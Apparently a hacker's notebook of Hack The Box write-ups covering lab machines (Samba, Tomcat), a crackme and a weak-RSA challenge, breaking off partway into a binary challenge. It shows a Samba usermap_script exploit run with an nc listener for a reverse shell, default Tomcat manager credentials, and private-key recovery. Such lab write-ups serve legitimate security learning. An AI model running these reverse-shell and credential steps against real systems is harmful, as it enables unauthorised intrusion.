OS="Linux"
DIFFICULTY="Easy"
IP"10.10.10.3"

## == nmap scan
> nmap -sV -sC -vv 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3

## == probe anonymous ftp login
> ncftp -u anonymous 10.10.10.3
...
Login successful.
## --> sadly no items found


## == check samba shares
# lists public shares on a server
> smbclient -L 10.10.10.3 -U%

# show a tree diagram of all the shares
> smbtree -b -N

# full smb enumeration
> enum4linux -a 10.10.10.3

# show details like permissions
> smbmap -H 10.10.10.3
## --> we get rw access om "/tmp"

# connect with user "anonymous" to "/tmp" share
> smbclient -N //10.10.10.3/tmp
## --> looking around but no cool stuff in there


## == checking for CVE's
# nmap says
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.3.4
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian

# using searchsploit
> searchsploit vsftpd 2.3.4
> searchsploit Openssh 4.7p1
> searchsploit Samba 3.0
## --> got a lot of CVE`s

# vsftpd
> searchsploit -m unix/remote/49757.py

## == small insert
## shortn the route with:
## "https://github.com/amriunix/CVE-2007-2447"
## usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
## after running this script we got root :)
> nc -lnvp 555
> python ./usermap_script.py 10.10.10.3 139 10.10.14.14 555

CHALLANGE="file"
FILETYPE="exe"
DIFFICULTY="easy"

## download and extract password protected zip file
> unzip -P hackthebox  Find\ The\ Easy\ Pass.zip

## inspect the exe
> file EasyPass.exe
EasyPass.exe: PE32 executable (GUI) Intel 80386, for MS Windows

## get a lot of more infos
> rabin2 -I EasyPass.exe
arch     x86
baddr    0x400000
binsz    402432
bintype  pe
bits     32
canary   false
retguard false
class    PE32
cmp.csum 0x00063785
compiled Sat Jun 20 00:22:17 1992
crypto   false
endian   little
havecode true
...

## deeper inspect with "objdump"
> objdump -s EasyPass.exe
## --> got a lot of infos, lets play a little bit
> objdump -s EasyPass.exe | grep -i 'pass\|valid\return\|wrong\|0x'
 40d970 c3000000 ffffffff 02000000 30780000  ............0x..
 428d10 38584500 e48a4200 30584500 dc8a4200  8XE...B.0XE...B.
 42ad00 00000028 000c5061 7373776f 72644368  ...(..PasswordCh
 454200 57726f6e 67205061 7373776f 72642100  Wrong Password!.
 45e5d0 68306c30 70307430 78307c30 80308430  h0l0p0t0x0|0.0.0
 460860 50305430 58307030 90309830 9c30a030  P0T0X0p0.0.0.0.0
 462a60 25303f30 43304730 4c305830 5c308630  %0?0C0G0L0X0\0.0
 462ef0 48304c30 50305430 58305c30 60306430  H0L0P0T0X0\0`0d0
 462f00 68306c30 70307430 78307c30 80308430  h0l0p0t0x0|0.0.0
 4682b0 65722050 61737377 6f726400 00055445  er Password...TE
 468330 65636b20 50617373 776f7264 08546162  eck Password.Tab
## --> if the instruction "Wrong Password" bring us on the right path?
 454200 57726f6e 67205061 7373776f 72642100  Wrong Password!.

## using rabin2 with the "-z" option for really nice table view
> rabin2 -z EasyPass.exe | grep -i pass
469 0x000622ad 0x004682ad 14  15   .rsrc   ascii   Enter Password
481 0x0006232e 0x0046832e 23  24   .rsrc   ascii   Check Password\bTabOrder

## using a decompiler to get more infos - radare2 is a crazy cmd line tool ;)
> radare2 EasyPass.exe
 -- THE ONLY WINNING MOVE IS NOT TO PLAY.
[0x00454450]> aa # analyze the binary
[x] Analyze all flags starting with sym. and entry0 (aa)

[0x00454450]> aaa # analyze the binary a bit more
[Invalid function name 'sub.user32.dll_GetWindowThreadProcessId' at 0x0040699c
Invalid function name 'sub.user32.dll_GetWindow' at 0x00406964
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.

[0x00454450]> aav # analyzing program structure and discovering functions
[x] Finding xrefs in noncode section with anal.in=io.maps
[x] Analyze value pointers (aav)
[x] Value from 0x00454600 to 0x00455000 (aav)
[x] 0x00454600-0x00455000 in 0x454600-0x455000 (aav)
[x] 0x00454600-0x00455000 in 0x401000-0x454600 (aav)
[x] Value from 0x00401000 to 0x00454600 (aav)
[x] 0x00401000-0x00454600 in 0x454600-0x455000 (aav)
[x] 0x00401000-0x00454600 in 0x401000-0x454600 (aav)

[0x00454450]> s entry0 # get on the entry point of the program

[0x00454450]> izz | grep -i pass # search again for the buzzword "pass"
2808 0x0002a105 0x0042ad05 13  14   CODE    ascii   \fPasswordChar
5483 0x00053600 0x00454200 15  16   CODE    ascii   Wrong Password!
7072 0x000622ad 0x004682ad 14  15   .rsrc   ascii   Enter Password
7084 0x0006232e 0x0046832e 23  24   .rsrc   ascii   Check Password\bTabOrder

[0x00454450]> s 0x00454200 # get on the start point "Wrong Password" we found above

[0x00454450]> V # starts the visual mode - "p" and "P" switch the view mode
## --> if we scroll quite above we can find a string printing "Good Job, Congratulation"
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF  comment
0x004541d0  2100 0000 ffff ffff 1900 0000 476f 6f64  !...........Good  ; aav.0x004541d0  ; aav.0x004541dc                                                             
0x004541e0  204a 6f62 2e20 436f 6e67 7261 7475 6c61   Job. Congratula                                                                                                 
0x004541f0  7469 6f6e 7300 0000 ffff ffff 0f00 0000  tions...........                                                                                                 
0x00454200  5772 6f6e 6720 5061 7373 776f 7264 2100  Wrong Password!.  ; aav.0x00454200  

## we need to find the reference "0x004541dc" from the comment section
[0x0045412b]> axt 0x4541dc # (A cross(X)-reference To)
(nofunc) 0x454138 [DATA] mov eax, aav.0x004541dc

[0x00454450]> V # enter the visual mode again
## lets change the view to "[xaDvc]" with uppercase "P" and scroll to "0x00454138"
## now we see the called function "call fcn.00427a30"
0x00454138      b8dc414500     mov eax, aav.0x004541dc     ; "Good Job. Congratulations"                                                                  
0x0045413d      e8ee38fdff     call fcn.00427a30           ;[1]                                                                                           
0x00454142      eb0a           jmp 0x45414e                                                                                                               
; CODE XREF from aav.0x00454070 @ +0xc6                                                                                                                   
0x00454144      b800424500     mov eax, aav.0x00454200     ; "Wrong Password!"                                                                            
0x00454149      e8e238fdff     call fcn.00427a30           ;[1] 

## the function is two times listet - once for rejected and once for accepted password
## if we scroll more up we see often the "call fcn.004042b4" > here we have our password :)
0x00454093      ba88414500     mov edx, aav.0x00454188     ; "f"
0x00454098      e81702fbff     call fcn.004042b4           ;[1]
0x0045409d      8d45f4         lea eax, [ebp - 0xc]
0x004540a0      ba94414500     mov edx, aav.0x00454194     ; "o"
0x004540a5      e80a02fbff     call fcn.004042b4           ;[1]
0x004540aa      8d45f0         lea eax, [ebp - 0x10]
0x004540ad      baa0414500     mov edx, aav.0x004541a0     ; "r"
0x004540b2      e8fd01fbff     call fcn.004042b4           ;[1]
0x004540b7      8d45ec         lea eax, [ebp - 0x14]
0x004540ba      baac414500     mov edx, aav.0x004541ac     ; "t"
0x004540bf      e8f001fbff     call fcn.004042b4           ;[1]
CODE XREF from aav.0x00454050 @ +0x5
0x004540c4      8d45e8         lea eax, [ebp - 0x18]
0x004540c7      baa0414500     mov edx, aav.0x004541a0     ; "r"
0x004540cc      e8e301fbff     call fcn.004042b4           ;[1]
0x004540d1      8d45e4         lea eax, [ebp - 0x1c]
0x004540d4      bab8414500     mov edx, aav.0x004541b8     ; "a"
0x004540d9      e8d601fbff     call fcn.004042b4           ;[1]
0x004540de      8d45e0         lea eax, [ebp - 0x20]
0x004540e1      bac4414500     mov edx, aav.0x004541c4     ; "n"
0x004540e6      e8c901fbff     call fcn.004042b4           ;[1]
0x004540eb      8d45dc         lea eax, [ebp - 0x24]
0x004540ee      bad0414500     mov edx, aav.0x004541d0     ; "!"
0x004540f3      e8bc01fbff     call fcn.004042b4           ;[1]

CHALLANGE="file"
FILETYPE="public_key"
DIFFICULTY="easy"

## download and extract password protected zip file
> unzip -P hackthebox Weak\ RSA.zip

## we've got 2 files
flag.enc
key.pub

## lets see whats in the pub.key
> cat key.pub
-----BEGIN PUBLIC KEY-----
MIIBHzANBgkqhkiG9w0BAQEFAAOCAQwAMIIBBwKBgQMwO3kPsUnaNAbUlaubn7ip
4pNEXjvUOxjvLwUhtybr6Ng4undLtSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy
23CZuOl3WIsLiRKSVYyqBc9d8rxjNMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3
RQP/6p5hv1PYcWmErEeDewKBgGEXxgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpD
qlqqOFD8JA5UFK0roQkOjhLWSVu8c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ
4gYo6Ax+U7q6TOWhQpiBHnC0ojE8kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8sr
lb/N
-----END PUBLIC KEY-----

## okay - a good docu about SSLkeys is in the debian wiki
## see: https://wiki.debian.org/SSLkeys

## lets try "RsaCtfTool" and dump parameter
> rsactftool --dumpkey --key key.pub
n: 5731778245796309116684692727125478654435566540861901047227955\
0975689167002325903127543350912148103033159856937938350592831549\
5462888788593695945321417676298471525243254143375622365552296949\
4139206792905357171723195620643089373425674836904865928683527630\
21360051776130919666984258847567032959931761686072492923
e: 6818092863128414721282050719260573463203552413113993861806957\
5375591806315288775310503696874509130847529572462608728019290710\
1496613002461380365793420795804347773441112454951879278811321383\
5795874497424336596220483508975398766739551168282939127671435958\
2055290140617797814443530797154040685978229936907206605

## okay lets try to extract the priv_key from public_key
> rsactftool --publickey ./key.pub --private
rivate argument is not set, the private key will not be displayed, even if recovered.
[*] Testing key key.pub.
## maybe a error caused by missed dependencies
## i've cloned the git repo and install the requirements
> pip3 install -r "requirements.txt"
## this caused me trouble
## issue already closed
> pip uninstall PyCrypto
> pip uninstall PyCryptodome
> pip install PyCryptodome
## after another try - no results - maybe a bug...
## i've tried a fork of the tool
> git clone https://github.com/daedalus/RsaCtfTool
> python RsaCtfTool/RsaCtfTool.py  --publickey ./key.pub --private

## bingo :)
Private key :
-----BEGIN RSA PRIVATE KEY-----
MIICOQIBAAKBgQMwO3kPsUnaNAbUlaubn7ip4pNEXjvUOxjvLwUhtybr6Ng4undL
tSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy23CZuOl3WIsLiRKSVYyqBc9d8rxj
NMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3RQP/6p5hv1PYcWmErEeDewKBgGEX
xgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpDqlqqOFD8JA5UFK0roQkOjhLWSVu8
c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ4gYo6Ax+U7q6TOWhQpiBHnC0ojE8
kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8srlb/NAiBhwngxi+Cbie3YBogNzGJV
h10vAgw+i7cQqiiwEiPFNQJBAYXzr5r2KkHVjGcZNCLRAoXrzJjVhb7knZE5oEYo
nEI+h2gQSt1bavv3YVxhcisTVuNrlgQo58eGb4c9dtY2blMCQQIX2W9IbtJ26KzZ
C/5HPsVqgxWtuP5hN8OLf3ohhojr1NigJwc6o68dtKScaEQ5A33vmNpuWqKucecT
0HEVxuE5AiBhwngxi+Cbie3YBogNzGJVh10vAgw+i7cQqiiwEiPFNQIgYcJ4MYvg
m4nt2AaIDcxiVYddLwIMPou3EKoosBIjxTUCQQCnqbJMPEQHpg5lI6MQi8ixFRqo
+KwoBrwYfZlGEwZxdK2Ms0jgeta5jFFS11Fwk5+GyimnRzVcEbADJno/8BKe
-----END RSA PRIVATE KEY-----

## lets decrypt the file
> openssl rsautl -decrypt -in ./flag.enc -out ./flag.txt -inkey ./key.priv
## woohoo - we've got the flag xD

OS="Windows"
DIFFICULTY="Easy"
IP"10.10.10.95"

## == nmap scan
> nmap -sV -sC -vv 10.10.10.95
Discovered open port 8080/tcp on 10.10.10.95

## == port 8080 - apache tomcat
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

## check the searchsploit db for cve`s
> searchsploit tomcat 7.0.88

----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | windows/webapps/42953.txt
----------------------------------------------------------------------------- ---------------------------------

## get the python exploit
> searchsploit -m 42966

## check the exploit
./cve-2017-12617.py [options]                                                                                                          
                                                                                                                                       
options:                                                                                                                               
                                                                                                                                       
-u ,--url [::] check target url if it's vulnerable                                                                                     
-p,--pwn  [::] generate webshell and upload it                                                                                         
-l,--list [::] hosts list

## run check first
> python 42966.py -u 10.10.10.95:8080
requests.exceptions.InvalidSchema: No connection adapters were found for '10.10.10.95:8080

## get the txt file
> searchsploit -m 42953
> cat 42953
E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
## okay, we need to put the content of this file on the server and pull the request URL
## on server HTTP PUTs has to be enabled
## this has to be done on the admin interface - lets check the interface
> nikto -h 10.10.10.95:8080
...
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
...
## default account
ID: tomcat
PW: s3cret

## lets try to login into manger-app
> elinks 10.10.10.95:8080/manager/html

## bingo :)
   Tomcat Web Application Manager                                                                                                      
                                                                                                                                       
   ┌────────────┬───────────┐                                                                                                          
   │Message:    │OK         │                                                                                                          
   └────────────┴───────────┘ 


CHALLANGE="file"
FILETYPE="?"
DIFFICULTY="easy"

## download and extract password protected zip file
> unzip -P hackthebox You\ know\ 0xDiablos.zip
Archive:  You know 0xDiablos.zip
   skipping: vuln                    need PK compat. v5.1 (can do v4.6)
## okay this wont work > next try
> 7z x You\ know\ 0xDiablos.zip -phackthebox
Everything is Ok

## we've got a file called "vuln" - lets check what this is
> cat vuln
ELF484
...
tii        libc.so.6_IO_stdin_usedexitfopenputsprintffgetsstdoutsetresgidgetegidsetvbuf__libc_start_mainGLIBC_2.1GLIBC_2.0__gmon_start__ii
...
[^_]ÍvË,$_[rflag.txtHurry up and try in on server side.You know who are 0xDiablos: P
...
GCC: (Debian 8.3.0-19) 8.3́.0
## nice - looks likes unformated C code or something that can compiled with GCC